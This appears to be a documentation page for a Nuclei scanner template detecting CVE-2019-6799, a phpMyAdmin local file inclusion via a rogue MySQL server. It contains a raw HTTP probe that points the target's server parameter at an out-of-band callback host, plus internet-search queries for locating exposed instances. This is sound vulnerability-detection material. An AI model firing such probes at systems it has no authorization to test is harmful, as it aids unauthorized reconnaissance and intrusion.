phpMyAdmin <4.8.5 - Local File Inclusion
ID: CVE-2019-6799
Severity: medium
Author: pwnhxl
Tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli
Description
Section titled “Description”phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server’s user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.
YAML Source
Section titled “YAML Source”id: CVE-2019-6799
info: name: phpMyAdmin <4.8.5 - Local File Inclusion author: pwnhxl severity: medium description: | phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability. reference: - https://paper.seebug.org/1112/#_4 - https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6799 - https://github.com/rmb122/rogue_mysql_server - https://github.com/vulnspy/phpmyadmin-4.8.4-allowarbitraryserver - https://nvd.nist.gov/vuln/detail/CVE-2019-6799 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2019-6799 epss-score: 0.1829 epss-percentile: 0.96069 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: phpmyadmin product: phpmyadmin shodan-query: - title:"phpmyadmin" - http.title:"phpmyadmin" - http.component:"phpmyadmin" - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" fofa-query: - body="pma_servername" && body="4.8.4" - title="phpmyadmin" google-query: intitle:"phpmyadmin" hunter-query: - app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" - app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli
http: - raw: - | GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1 Host: {{Hostname}}
payloads: path: - /index.php - /pma/index.php - /pmd/index.php - /phpMyAdmin/index.php - /phpmyadmin/index.php - /_phpmyadmin/index.php
attack: batteringram stop-at-first-match: true
matchers-condition: and matchers: - type: dsl dsl: - compare_versions(version, '< 4.8.5')
- type: dsl dsl: - compare_versions(version, '> 3.9.9')
- type: dsl dsl: - compare_versions(phpversion, '< 7.3.4')
- type: word part: interactsh_protocol words: - dns
- type: word words: - mysqli_real_connect
- type: word words: - pma_servername
- type: status status: - 200
extractors: - type: regex name: version group: 1 regex: - \?v=([0-9.]+) internal: true
- type: regex group: 1 regex: - \?v=([0-9.]+)
- type: regex name: phpversion group: 1 regex: - "X-Powered-By: PHP/([0-9.]+)" internal: true part: header# digest: 4a0a00473045022028aebadb5958af247778b876a8bf8d533f6d64e23f0cc83edfd02b99ae1a4e4902210089b6ecfb79827370a9f6922f00daecdb4bba553a3b28525d5ff0e642bcd80276:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-6799.yaml"